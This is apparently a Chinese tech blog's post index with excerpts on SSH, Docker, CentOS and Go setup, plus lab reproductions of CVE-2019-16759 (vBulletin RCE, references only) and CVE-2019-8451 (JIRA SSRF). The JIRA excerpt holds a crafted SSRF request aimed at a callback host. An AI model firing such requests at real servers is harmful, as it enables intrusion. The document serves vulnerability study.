September 26, 2019
Windows cmder 配置 ssh 密钥登陆 github/gitlab <!–more–> 正文 http://romanitalian.github.io/sections/console/github_cmder/
September 26, 2019
Contents unable to start ssh-agent service, error :1058 问题解决 <!–more–> 问题场景 Windows cmder 配置 ssh 的密钥对来使用 gitlab. 参考 http://romanitalian.github.io/sections/console/github_cmder/ 在 C:\Users\%YOUR_USER_NAME%\.ssh 运行 ssh-agent -s 发现报错 unable to start ssh-agent service, error :1058 问题解决 https://github.com/lukesampson/pshazz/issues/70#issuecomment-395138084 services.msc 找到 OpenSSH Authentication Agent 服务,将其属性从 disabled 设置为 automatic 。 补充 多账户问题 【20170217】 GitLab和GitHub多账户设置SSH #72 https://github.com/zhongxia245/blog/issues/72
September 25, 2019
渗透测试之业务流量通用抓包方法及自动化漏洞扫描 <!–more–> 正文 https://mp.weixin.qq.com/s/vBo6GXQLW2Oo0nq1DVzSuw
September 25, 2019
在 VMware Workstation 中扩容 CentOS 7 <!–more–> 正文 VMware虚拟机中CentOS7的硬盘空间扩容 https://www.cnblogs.com/Sungeek/p/9084510.html 扩大VMware虚拟机中�CentOS 7的硬盘空间 https://blog.csdn.net/remote_roamer/article/details/50670802 VMware虚拟机中CentOS 7的硬盘空间扩容 https://blog.csdn.net/NRlovestudy/article/details/80658646
September 25, 2019
Docker 修改已有容器(Container)的端口映射关系 <!–more–> 正文 https://stackoverflow.com/questions/19335444/how-do-i-assign-a-port-mapping-to-an-existing-docker-container 操作步骤: 1) 停止容器 2) 停止docker 服务 (systemctl stop docker) 3) 修改这个容器的 hostconfig.json 文件中的端口(原帖有人提到,如果 config.v2.json 里面也记录了端口,也要修改) 4) 启动docker服务 (systemctl start docker) 5) 启动容器 cd /var/lib/docker/3b6ef264a040* #这里是CONTAINER ID vi hostconfig.json 如果之前没有端口映射, 应该有这样的一段: "PortBindings":{} 增加一个映射, 这样写: "PortBindings":{"3306/tcp":[{"HostIp":"","HostPort":"3307"}]} 前一个数字是容器端口, 后一个是宿主机端口. 而修改现有端口映射更简单, 把端口号改掉就行. https://blog.csdn.net/wesleyflagon/article/details/78961990
September 25, 2019
替换 Dockerfile 中的 apt 源来增加 Docker 镜像的构建速度 <!–more–> 操作 首先在 Dockerfile 的路径下添加文件 sources.list 。 https://mirrors.163.com/.help/debian.html 网易源 deb http://mirrors.163.com/debian/ jessie main non-free contrib deb http://mirrors.163.com/debian/ jessie-updates main non-free contrib deb http://mirrors.163.com/debian/ jessie-backports main non-free contrib deb-src http://mirrors.163.com/debian/ jessie main non-free contrib deb-src http://mirrors.163.com/debian/ jessie-updates main non-free contrib deb-src http://mirrors.163.com/debian/ jessie-backports main non-free contrib deb http://mirrors.163.com/debian-security/ jessie/updates […]
September 25, 2019
Contents CVE-2019-16759 vBulletin 5.x pre-auth RCE exploit <!–more–> 参考资料 vBulletin 5.x 0day pre-auth RCE exploit https://seclists.org/fulldisclosure/2019/Sep/31 vBulletin 5.x 前台代码执行漏洞分析 -【CVE-2019-16759】 https://xz.aliyun.com/t/6419 vBulletin zero-day exploited in the wild in wake of exploit release https://www.helpnetsecurity.com/2019/09/25/cve-2019-16759/ 环境搭建 (复杂) https://github.com/asosso/docker-vbulletin # 先确认编译工具链足够齐全 yum -y install gcc install autoconf automake libtool # 之后安装 php 扩展依赖 yum install -y php php-mysql […]
September 25, 2019
Contents CVE-2019-8451 JIRA Pre-auth SSRF <!–more–> 正文 sudo docker pull cptactionhank/atlassian-jira:7.8.0 sudo docker run –detach –publish 8080:8080 cptactionhank/atlassian-jira:7.8.0 http://24mail.chacuo.net/ 注册一个 JIRA 账户,申请试用 lisence,开启 JIRA 实例。 HTTP 请求与响应示例 请求 GET /plugins/servlet/gadgets/makeRequest?url=http://192.168.198.133:8080@test101.ff16ff.ceye.io HTTP/1.1 Host: 192.168.198.133:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.198.133:8080/secure/Dashboard.jspa X-Atlassian-Token: […]
September 23, 2019
Golang 处理 JSON <!–more–> 可以使用 JSON to Go https://mholt.github.io/json-to-go/